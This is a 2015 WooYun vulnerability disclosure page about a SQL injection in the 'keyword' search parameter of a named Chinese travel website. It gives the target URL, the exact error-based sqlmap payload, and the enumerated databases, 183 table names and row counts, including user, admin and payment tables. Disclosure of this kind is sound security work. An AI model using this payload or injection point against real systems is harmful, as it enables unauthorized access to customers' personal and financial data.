当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142088

漏洞标题:蛙步旅游网SQL注入点#过万用户信息里面有大量的金额#

相关厂商:蛙步旅游网

漏洞作者: me1ody

提交时间:2015-09-19 22:53

修复时间:2015-11-03 22:54

公开时间:2015-11-03 22:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-19: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

权6 pr4
蛙步旅游网注入点打包
泄露 过万用户信息 账户里面有钱
管理员信息
订单信息
————————————————————————

详细说明:

注入点

http://www.wabuw.com/search-line/?keyword=大连


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: keyword (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: keyword=大连" AND (SELECT 4408 FROM(SELECT COUNT(*),CONCAT(0x7178786a71,(SELECT (ELT(4408=4408,1))),0x7176707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "Fgzi"="Fgzi
---
web application technology: PHP 5.2.14
back-end DBMS: MySQL >= 5.0.0
available databases [7]:
[*] binlog
[*] information_schema
[*] kekedb
[*] mysql
[*] test
[*] visit
[*] wabuw
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: keyword (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: keyword=大连" AND (SELECT 4408 FROM(SELECT COUNT(*),CONCAT(0x7178786a71,(SELECT (ELT(4408=4408,1))),0x7176707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "Fgzi"="Fgzi
---
web application technology: PHP 5.2.14
back-end DBMS: MySQL >= 5.0.0
Database: wabuw
[183 tables]
+--------------------------------+
| wabu__attr                     |
| wabu_about                     |
| wabu_accounting                |
| wabu_address_book              |
| wabu_address_book_dept         |
| wabu_admin                     |
| wabu_admin_access              |
| wabu_admin_group               |
| wabu_admin_keyword             |
| wabu_admin_log                 |
| wabu_admin_menus               |
| wabu_admin_module              |
| wabu_admin_module_group        |
| wabu_advertisements            |
| wabu_affixproduct              |
| wabu_anchor                    |
| wabu_beforeque                 |
| wabu_black                     |
| wabu_blacktext                 |
| wabu_buyproducts               |
| wabu_buyproducts_ccr_relation  |
| wabu_caigou_car                |
| wabu_caigou_contact            |
| wabu_caigou_hotel              |
| wabu_caigou_hotelprice         |
| wabu_caigou_kind               |
| wabu_caigou_lave               |
| wabu_caigou_line               |
| wabu_caigou_lineprice          |
| wabu_caigou_other              |
| wabu_caigou_ticket             |
| wabu_caigou_visa               |
| wabu_car                       |
| wabu_car_img_relation          |
| wabu_category                  |
| wabu_category_attr             |
| wabu_category_hotel            |
| wabu_category_info             |
| wabu_category_jd               |
| wabu_category_line             |
| wabu_city                      |
| wabu_class                     |
| wabu_class_attr                |
| wabu_class_category_relation   |
| wabu_class_relation            |
| wabu_comment                   |
| wabu_content_ccr_relation      |
| wabu_cruiseship                |
| wabu_cruiseship_img_relation   |
| wabu_cruiseship_line           |
| wabu_cruiseship_pack           |
| wabu_cruiseship_room           |
| wabu_cruiseshiproom_price      |
| wabu_departurecity             |
| wabu_freeline_car_relation     |
| wabu_freeline_price            |
| wabu_freeline_room_relation    |
| wabu_freeline_singleroom       |
| wabu_groupbooking              |
| wabu_help                      |
| wabu_hotel                     |
| wabu_hotel_ccr_relation        |
| wabu_hotel_room                |
| wabu_hotel_tag_relation        |
| wabu_image                     |
| wabu_indexflash                |
| wabu_info                      |
| wabu_info_ccr_relation         |
| wabu_info_snap                 |
| wabu_info_tag_relation         |
| wabu_keyword                   |
| wabu_kite                      |
| wabu_knowledge                 |
| wabu_knowledge_ccr_relation    |
| wabu_landscape                 |
| wabu_landscape_ccr_relation    |
| wabu_landscape_img_relation    |
| wabu_landscape_snap            |
| wabu_landscape_tag_relation    |
| wabu_lave_payment              |
| wabu_lave_paymented            |
| wabu_laveorder_payment         |
| wabu_laveorder_paymented       |
| wabu_line                      |
| wabu_line_affix_relation       |
| wabu_line_append               |
| wabu_line_attr                 |
| wabu_line_ccr_relation         |
| wabu_line_collection           |
| wabu_line_groupprice           |
| wabu_line_img_relation         |
| wabu_line_search               |
| wabu_line_setcarsprice         |
| wabu_line_special              |
| wabu_line_zifei                |
| wabu_linecodot                 |
| wabu_linefreeman               |
| wabu_linefreemanprice          |
| wabu_linegbook                 |
| wabu_linehotelpack             |
| wabu_linehotelprice            |
| wabu_lineprice                 |
| wabu_link                      |
| wabu_lnvoice                   |
| wabu_mailrelation              |
| wabu_mailsubscription          |
| wabu_meetinginfo               |
| wabu_meetingplace              |
| wabu_meetingplace_img_relation |
| wabu_message                   |
| wabu_neworders                 |
| wabu_option                    |
| wabu_order_car                 |
| wabu_order_contents            |
| wabu_order_contract            |
| wabu_order_contract_type       |
| wabu_order_coupon              |
| wabu_order_groupon             |
| wabu_order_invoice             |
| wabu_order_lave                |
| wabu_order_member              |
| wabu_order_num                 |
| wabu_order_other               |
| wabu_order_pact                |
| wabu_order_payment             |
| wabu_order_paymented           |
| wabu_order_room                |
| wabu_order_status              |
| wabu_order_team                |
| wabu_order_ticket              |
| wabu_order_ticketcard          |
| wabu_orderlave_v               |
| wabu_other_payment             |
| wabu_payment_refund            |
| wabu_phone_base                |
| wabu_phone_pack                |
| wabu_phone_pack_template       |
| wabu_process                   |
| wabu_question                  |
| wabu_receipt                   |
| wabu_redeem                    |
| wabu_relation_attr             |
| wabu_remind                    |
| wabu_search_keyword            |
| wabu_seo                       |
| wabu_siteevalucation           |
| wabu_sorce                     |
| wabu_stationletters            |
| wabu_statistics                |
| wabu_status                    |
| wabu_status_child              |
| wabu_stymsms                   |
| wabu_subject                   |
| wabu_supplier                  |
| wabu_supplier_contact          |
| wabu_supplier_hotelprice       |
| wabu_supplier_kind             |
| wabu_supplier_lineprice        |
| wabu_sys_deduct                |
| wabu_sys_deductgroup           |
| wabu_table_attr                |
| wabu_tag                       |
| wabu_tags                      |
| wabu_tem_class                 |
| wabu_tem_landscape_area        |
| wabu_tour_base                 |
| wabu_tour_pack                 |
| wabu_tour_pack_hotel           |
| wabu_tour_pack_hotel1          |
| wabu_tour_ticket_template      |
| wabu_travel                    |
| wabu_tuan_juan                 |
| wabu_tuan_orders               |
| wabu_user                      |
| wabu_user_attribution          |
| wabu_user_consult              |
| wabu_userquestion              |
| wabu_visa                      |
| wabu_visa_ccr_relation         |
| wabu_visaorder                 |
| wabu_website                   |
| wabu_weixin_class              |
| wabu_weixin_line               |
+--------------------------------+
Database: wabuw
+-------------------------------+---------+
| Table                         | Entries |
+-------------------------------+---------+
| wabu_stymsms                  | 168360  |
| wabu_landscape_ccr_relation   | 133411  |
| wabu_info_ccr_relation        | 96055   |
| wabu_image                    | 60917   |
| wabu_lineprice                | 55692   |
| wabu_neworders                | 52838   |
| wabu_order_contents           | 50155   |
| wabu_landscape_img_relation   | 36951   |
| wabu_user                     | 31048   |
| wabu_order_status             | 27790   |
| wabu_line_img_relation        | 25998   |
| wabu_line_ccr_relation        | 23978   |
| wabu_info_tag_relation        | 22167   |
| wabu_admin_keyword            | 20250   |
| wabu_linehotelprice           | 19823   |
| wabu_class_category_relation  | 19608   |
| wabu_linefreemanprice         | 19384   |
| wabu_message                  | 19338   |
| wabu_kite                     | 19258   |
| wabu_sorce                    | 17532   |
| wabu_order_lave               | 16936   |
| wabu_comment                  | 15044   |
| wabu_seo                      | 14460   |
| wabu_travel                   | 13788   |
| wabu_order_member             | 13278   |
| wabu_order_payment            | 12008   |
| wabu_info                     | 9443    |
| wabu_orderlave_v              | 9429    |
| wabu_laveorder_payment        | 9107    |
| wabu_category_jd              | 8645    |
| wabu_order_coupon             | 8000    |
| wabu_stationletters           | 7924    |
| wabu_class_attr               | 7684    |
| wabu_landscape                | 6823    |
| wabu_user_consult             | 5916    |
| wabu_order_contract           | 5327    |
| wabu_order_pact               | 4738    |
| wabu_order_invoice            | 4473    |
| wabu_hotel_ccr_relation       | 4342    |
| wabu_city                     | 3683    |
| wabu_laveorder_paymented      | 3431    |
| wabu_hotel_room               | 3401    |
| wabu_lave_payment             | 3224    |
| wabu_category_info            | 2713    |
| wabu_other_payment            | 2710    |
| wabu_line                     | 2590    |
| wabu_tag                      | 2540    |
| wabu_supplier_contact         | 2490    |
| wabu_line_search              | 2457    |
| wabu_supplier_lineprice       | 2416    |
| wabu_admin_access             | 2271    |
| wabu_category_line            | 1902    |
| wabu_caigou_contact           | 1811    |
| wabu_tem_class                | 1618    |
| wabu_keyword                  | 1544    |
| wabu_blacktext                | 1352    |
| wabu_accounting               | 1343    |
| wabu_phone_pack               | 1230    |
| wabu_supplier                 | 1197    |
| wabu_question                 | 1186    |
| wabu_hotel                    | 1104    |
| wabu_visa_ccr_relation        | 1070    |
| wabu_class                    | 1035    |
| wabu_admin_log                | 876     |
| wabu_tour_pack_hotel          | 821     |
| wabu_sys_deduct               | 752     |
| wabu_cruiseshiproom_price     | 735     |
| wabu_linefreeman              | 571     |
| wabu_cruiseship_img_relation  | 556     |
| wabu_tour_pack_hotel1         | 532     |
| wabu_caigou_lave              | 525     |
| wabu_weixin_line              | 497     |
| wabu_tour_ticket_template     | 464     |
| wabu_admin_module             | 433     |
| wabu_landscape_tag_relation   | 431     |
| wabu_tour_pack                | 401     |
| wabu_payment_refund           | 323     |
| wabu_knowledge                | 309     |
| wabu_caigou_hotel             | 307     |
| wabu_subject                  | 304     |
| wabu_phone_base               | 249     |
| wabu_advertisements           | 242     |
| wabu_category                 | 242     |
| wabu_hotel_tag_relation       | 209     |
| wabu_status_child             | 208     |
| wabu_lave_paymented           | 190     |
| wabu_order_car                | 178     |
| wabu_order_room               | 166     |
| wabu_cruiseship               | 164     |
| wabu_visa                     | 149     |
| wabu_weixin_class             | 145     |
| wabu_option                   | 142     |
| wabu_supplier_kind            | 142     |
| wabu_linehotelpack            | 135     |
| wabu_supplier_hotelprice      | 135     |
| wabu_line_setcarsprice        | 130     |
| wabu_help                     | 124     |
| wabu_link                     | 121     |
| wabu_category_hotel           | 117     |
| wabu_lnvoice                  | 105     |
| wabu_order_ticketcard         | 100     |
| wabu_search_keyword           | 97      |
| wabu_relation_attr            | 92      |
| wabu_linecodot                | 91      |
| wabu_anchor                   | 85      |
| wabu_cruiseship_pack          | 83      |
| wabu_cruiseship_line          | 79      |
| wabu_order_ticket             | 72      |
| wabu_line_special             | 71      |
| wabu_tem_landscape_area       | 68      |
| wabu_cruiseship_room          | 67      |
| wabu_indexflash               | 64      |
| wabu_groupbooking             | 62      |
| wabu_line_groupprice          | 59      |
| wabu_freeline_price           | 56      |
| wabu_redeem                   | 56      |
| wabu_order_paymented          | 53      |
| wabu_caigou_hotelprice        | 52      |
| wabu_admin                    | 47      |
| wabu_about                    | 45      |
| wabu_address_book             | 41      |
| wabu_black                    | 40      |
| wabu_meetinginfo              | 37      |
| wabu_caigou_car               | 36      |
| wabu_order_team               | 35      |
| wabu_freeline_car_relation    | 33      |
| wabu_admin_module_group       | 32      |
| wabu_car_img_relation         | 30      |
| wabu_siteevalucation          | 23      |
| wabu_status                   | 23      |
| wabu_knowledge_ccr_relation   | 22      |
| wabu_caigou_other             | 21      |
| wabu_tuan_orders              | 20      |
| wabu_admin_group              | 19      |
| wabu_receipt                  | 17      |
| wabu_buyproducts_ccr_relation | 16      |
| wabu_line_affix_relation      | 16      |
| wabu_line_zifei               | 16      |
| wabu_info_snap                | 15      |
| wabu_process                  | 14      |
| wabu_order_groupon            | 13      |
| wabu_userquestion             | 13      |
| wabu_caigou_ticket            | 12      |
| wabu_order_other              | 12      |
| wabu_tour_base                | 12      |
| wabu_tuan_juan                | 12      |
| wabu_freeline_room_relation   | 10      |
| wabu_beforeque                | 9       |
| wabu_car                      | 9       |
| wabu_buyproducts              | 8       |
| wabu_visaorder                | 8       |
| wabu_affixproduct             | 7       |
| wabu_user_attribution         | 7       |
| wabu_departurecity            | 6       |
| wabu_freeline_singleroom      | 6       |
| wabu_mailrelation             | 6       |
| wabu_tags                     | 6       |
| wabu_address_book_dept        | 5       |
| wabu_line_append              | 5       |
| wabu_line_collection          | 5       |
| wabu_category_attr            | 4       |
| wabu_landscape_snap           | 3       |
| wabu_order_contract_type      | 3       |
| wabu_order_num                | 3       |
| wabu_caigou_kind              | 2       |
| wabu_linegbook                | 2       |
| wabu_mailsubscription         | 2       |
| wabu_caigou_visa              | 1       |
| wabu_class_relation           | 1       |
| wabu_meetingplace             | 1       |
| wabu_phone_pack_template      | 1       |
| wabu_website                  | 1       |
+-------------------------------+---------+


1.png

漏洞证明:

1.png

修复方案:

- -

版权声明:转载请注明来源 me1ody@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)